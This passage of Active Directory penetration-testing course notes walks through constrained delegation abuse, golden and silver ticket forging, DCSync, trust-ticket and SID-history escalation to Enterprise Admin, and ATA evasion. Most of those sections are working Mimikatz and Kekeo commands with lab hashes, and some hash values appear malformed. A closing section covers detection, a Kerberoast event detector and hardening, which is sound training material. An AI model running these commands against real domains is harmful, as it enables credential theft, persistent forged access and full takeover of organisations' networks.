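        $unconstrained = ($uac -band $TRUSTED_FOR_DELEGATION) -ne 0
        $transition    = ($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION) -ne 0
        $constrained   = $targets.Count -gt 0
        if (-not ($unconstrained -or $constrained -or $transition)) { return }
        # The SPN list is only a hint: delegation is granted per account, so any
        # service running as the same account on the target host is reachable.
        $hosts = @($targets | ForEach-Object { ($_ -split '/')[1] -replace ':.*$', '' } | Select-Object -Unique)
        [pscustomobject]@{
            Account            = $obj.Name
            Class              = $obj.ObjectClass
            Unconstrained      = $unconstrained
            Constrained        = $constrained
            ProtocolTransition = $transition
            DelegatesTo        = ($targets -join '; ')
            TargetHosts        = ($hosts -join ', ')
        }
      }
}

# Domain controllers legitimately carry TRUSTED_FOR_DELEGATION; any other account
# with Unconstrained = True, or any account with ProtocolTransition = True, deserves review.
Get-DelegationReport | Sort-Object Unconstrained, ProtocolTransition -Descending | Format-Table -AutoSize
```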

- we need to get the clear text password or the NTLM hash of the service account. It can then be used with Kekeo:
https://github.com/gentilkiwi/kekeo/

.\asktgt.exe /user:termadmin /domain:lethallab.local /key:abf05c4e729e45781acd30ed80674b1c /ticket:termadmin.kirbi

- Now, using s4u from Kekeo, request a TGS:
.\s4u.exe /tgt:termadmin.kirbi /user:administrator@lethallab.local /service:cifs/ops-sqlsrvone.lethallab.local


- Use the TGS:
Invoke-Mimikatz -Command '"kerberos::ptt cifs.ops-sqlsrvone.lethallab.local.kirbi"'

ls \\ops-sqlsrvone.lethallab.local\C$

- remember that the delegation is not restricted by SPN, so it is possible to create alternate tickets. Exploit it :)

############################
Video 6 Persistence Techniques:

- there are many, but we will only cover 2 of them, and these 2 are really useful
- A golden ticket is signed and encrypted by the hash of the krbtgt account, which makes it a valid TGT ticket.
- since user account validation is not done by the Domain Controller (KDC service) until the TGT is older than 20 minutes, we can use even deleted/revoked accounts.
- the krbtgt user hash could be used to impersonate any user with any privileges from even a non-domain machine.
- a single password change has no effect on this ticket.

- Execute mimikatz on DC:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName win2016srv

- On Any Machine:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:lethallab.local /sid:s-1-5-21-32-70384115-3177237293-604223749 /krbtgt:5c1a7d30a872cac2b732e7857589d97 /id:500 /groups:513 /ptt"'

- To use the DCSync feature for getting the krbtgt hash, execute the following command with DA privileges for the ops domain:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:ops\krbtgt"'

Silver Ticket:
- A valid TGS (a Golden ticket is a TGT).
- Encrypted and signed by the NTLM hash of the service account of the service running with that account (a Golden ticket is signed by the hash of krbtgt).
- Services rarely check the PAC (Privileged Attribute Certificate).
- Services will allow access only to the services themselves.

- For example, using the hash of the Domain Controller computer account, the below command provides access to shares on the DC:
Invoke-Mimikatz -Command '"kerberos::golden /domain:lethallab.local /sid:s-1-5-21-3270384115-3177237293-604223748 /target:win2008srv.lethallab.local /service:cifs /rc4:536752aef9acef8ad3b089a281830b1 /id:500 /user:Administrator /ptt"'

#######################
Video 7 Privilege Escalation Across Trusts and Domains:

Child to Forest Root:
- Domains in the same forest have an implicit two-way trust with the forest root
- There is a trust key between the parent and child domains.
- There are 2 ways of escalating privileges between 2 domains of the same forest:
    - krbtgt hash
    - Trust tickets

Look up Child to Parent Trust Flow and read up on it!

Child to Forest Root using Trust Tickets:
- So what is required to forge trust tickets is, obviously, the trust key:
Invoke-Mimikatz -Command '"lsadump::trust /patch"'

- An inter-realm TGT can be forged:
Invoke-Mimikatz -Command '"Kerberos::golden /domain:win2008srv.lethallab.local /sid:s-1-5-21-133038098-372414864-1077246548 /sids:s-1-5-21-3270384115-3177237393-604224748-519 /rc4:f43d2a6daf7641d745fb225be755d8110 /user:Administrator /service:krbtgt /target:powershell.local /ticket:c:\users\Administrator\Desktop\trust_tkt.kirbi"'

- Use the TGS to access the targeted service:
.\kirbikator.exe lsa .\CIFS.ps-dc.powershell.local.kirbi ls \\ps-dc.powershell.local\C$

- Get a TGS for a service (CIFS below) in the target domain by using the forged trust ticket:
.\asktgs.exe c:\users\administrator\Desktop\trust_tkt.kirbi CIFS/ps-dc.powershell.local

- Tickets for other services (like HOST and RPCSS for WMI, HOST and HTTP for PowerShell Remoting and WinRM) can be created as well.

Child to Forest Root using krbtgt hash:
- SID history once again:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:offensiveps.powershell.local /sid:s-1-5-21-2969453985-3470385542-739374646 /krbtgt:a9d1cf9d08b6701bca220079b1557506 /sids:s-1-5-21-257853-8781-2508153159-3419410681-519 /ticket:krb_tkt.kirbi"'

- On a machine of the offensiveps domain:
Invoke-Mimikatz -Command '"kerberos::pt c:\test\krb_tkt.kirbi"'

- We now have Enterprise Admin privileges:
ls //ps-dc.powershell.local/C$

#######################
Video 8 Detection and Defense:

- Do not allow, or limit, logins of DAs to any machine other than the Domain Controller. If login to some server is necessary, do not allow other administrators to log in to that machine!
- Do NOT run services with a DA account. Many good credential reuse defenses are rendered useless because of it.

Some Important Event IDs:
-Event ID:
    - 4624: Account Logon
    - 4634: Admin Logoff
    - 4672: Admin Logon

Detection and Defense against Kerberoast:
Events:
- Security Event ID 4769 - A Kerberos ticket was requested

Mitigation:
- Service Account passwords should be difficult to guess (greater than 25 characters)
- Use Managed Service Accounts (automatic periodic change of password and delegated SPN management)
https://technet.microsoft.com/en-us/library/jj128431(v=ws.11).aspx
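As an added defender-side example (not part of the course notes), a PowerShell function that flags Kerberoast-style requests in event 4769 data. It assumes the common heuristic that Kerberoast tooling requests RC4 (encryption type 0x17) tickets for many user-account SPNs in a short window; the function names, thresholds and sample events are constructed here.

```powershell
# Added example (not from the course notes): flag Kerberoast-style TGS requests in
# Security event 4769 records: RC4 (0x17) tickets for user-account SPNs, many of them
# from one requester in a short window. Names, thresholds and sample data are constructed.
function Find-KerberoastCandidates {
    param(
        [Parameter(Mandatory)] [object[]] $Events,    # flattened 4769 fields, see ConvertFrom-Event4769
        [int] $Threshold = 5, [int] $WindowMinutes = 10  # distinct SPNs per requester within the window
    )
    $rc4 = $Events | Where-Object {
        $_.TicketEncryptionType -eq '0x17' -and   # RC4-HMAC, the type Kerberoast tooling asks for
        $_.Status -eq '0x0' -and                  # ticket was actually issued
        $_.ServiceName -notmatch '\$$' -and $_.ServiceName -ne 'krbtgt'  # skip machine accounts and TGT renewals
    }
    $rc4 | Group-Object TargetUserName, IpAddress | ForEach-Object {
        $spns  = @($_.Group.ServiceName | Sort-Object -Unique)
        $times = @($_.Group.TimeCreated | Sort-Object)
        if ($spns.Count -ge $Threshold -and ($times[-1] - $times[0]).TotalMinutes -le $WindowMinutes) {
            [pscustomobject]@{
                Requester = $_.Group[0].TargetUserName
                ClientIP  = $_.Group[0].IpAddress
                SpnCount  = $spns.Count
                Services  = ($spns -join ', ')
            }
        }
    }
}

# Flatten a live 4769 EventLogRecord into the shape the function expects.
function ConvertFrom-Event4769 {
    param([Parameter(Mandatory, ValueFromPipeline)] $Record)
    process {
        $d = @{}
        foreach ($n in ([xml]$Record.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            TimeCreated = $Record.TimeCreated;  TargetUserName = $d.TargetUserName
            ServiceName = $d.ServiceName;       IpAddress      = $d.IpAddress
            TicketEncryptionType = $d.TicketEncryptionType; Status = $d.Status
        }
    }
}
# On a DC: Find-KerberoastCandidates -Events (Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} | ConvertFrom-Event4769)

# Constructed sample input: one client pulls RC4 tickets for six service accounts within
# seconds, plus one ordinary AES (0x12) ticket for a machine account that must not count.
$t0 = Get-Date '2024-01-01 09:00'
$sample = foreach ($i in 1..6) {
    [pscustomobject]@{ TimeCreated = $t0.AddSeconds($i); TargetUserName = 'jdoe@LETHALLAB.LOCAL'
        ServiceName = "svc_app$i"; IpAddress = '::ffff:10.0.0.5'; TicketEncryptionType = '0x17'; Status = '0x0' }
}
$sample += [pscustomobject]@{ TimeCreated = $t0; TargetUserName = 'jdoe@LETHALLAB.LOCAL'
    ServiceName = 'WIN2016SRV$'; IpAddress = '::ffff:10.0.0.5'; TicketEncryptionType = '0x12'; Status = '0x0' }
Find-KerberoastCandidates -Events $sample | Format-Table -AutoSize
```

On the sample data one row is reported for jdoe from ::ffff:10.0.0.5 with SpnCount 6; tune the threshold against a baseline of legitimate RC4 requests (legacy services still configured for RC4 produce steady, low-volume 0x17 events).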

SID filtering:
- avoids attacks which abuse the SID history attribute (child to root domain privilege escalation, that is, DA from a child to EA on the forest root).
- enabled by default on all inter-forest trusts. Intra-forest trusts are assumed secure by default (Microsoft considers the forest, not the domain, to be a security boundary).
- But, since SID filtering has the potential to break applications and user access, it is often disabled.

Selective Authentication:
- in an inter-forest trust, if Selective Authentication is configured, users between the trusts will not be automatically authenticated. Individual access to domains and servers in the trusting domain/forest should be given.

Microsoft ATA (Advanced Threat Analytics):
- traffic destined for Domain Controller(s) is mirrored to ATA sensors and a user activity profile is built over time - use of computers, credentials, logon machines, etc.
- Collect Event 4776 (The DC attempted to validate the credentials for an account) to detect credential replay attacks.
- Can DETECT behaviour anomalies!
- Useful for detecting:
    - Recon: account enumeration, Netsession enumeration
    - Compromised Credentials Attacks: Brute force, high privilege account/service account exposed in clear text, Honey token, unusual protocol (NTLM and Kerberos)
    - Credential/Hash/Ticket Replay attacks.

Bypassing ATA:
- ATA, for all its goodness, can be bypassed and avoided
- The key is to avoid talking to the DC as long as possible and make the traffic we generate as attacker seem normal!

Architectural Changes:
LAPS (Local Administrator Password Solution):
- Centralized storage of passwords in AD with periodic randomizing, where read permissions can be access controlled
- Storage in clear text, transmission is encrypted
- LAPS info: https://technet.microsoft.com/en-us/mt227395.aspx
- Abusing LAPS feature:
https://blog.netspi.com/running-laps-around-cleartext-passwords/

Privileged Administrative Workstations (PAWs):
- a hardened workstation for performing sensitive tasks like management of domain controllers, cloud infrastructure, sensitive business functions, etc.
- can provide protection from phishing attacks, OS vulnerabilities, credential replay attacks.

Multiple strategies:
- Separate privilege and hardware for administrative and normal tasks
- Admin jump servers to be accessed only from a PAW
- Having a VM on a PAW for user tasks

Active Directory Administrative Tier Model
Composed of 3 levels only for administrative accounts:
- Tier 0 - Accounts, Groups, and Computers which have privileges across the enterprise, like domain controllers, domain admins, enterprise admins.
- Tier 1 - Accounts, Groups and Computers which have access to resources having a significant amount of business value. A common example role is server administrators who maintain these operating systems with the ability to impact all enterprise services.
- Tier 2 - Administrator accounts which have administrative control of a significant amount of business value that is hosted on user workstations and devices. Examples include Help Desk and computer support administrators, because they can impact the integrity of almost any user data.

So we are implementing: Control Restrictions, Logon Restrictions (and directional from Tier 2, to Tier 1, to Tier 0).

ESAE (Enhanced Security Admin Environment):
Dedicated administrative forest for managing critical assets like administrative users, groups and computers.
Since a forest is considered a security boundary rather than a domain, this model provides enhanced security controls.
The administrative forest is also called the Red Forest!
Administrative users in a production forest are used as standard non-privileged users in the administrative forest.
Selective Authentication to the Red Forest enables stricter security controls on logon of users from non-administrative forests.

Securing Privileged Access:
https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/securing-privileged-access

Microsoft Paper - Best Practices for Securing Active Directory:
http://aka.ms/bpsadtrd

#################### THE END ################################################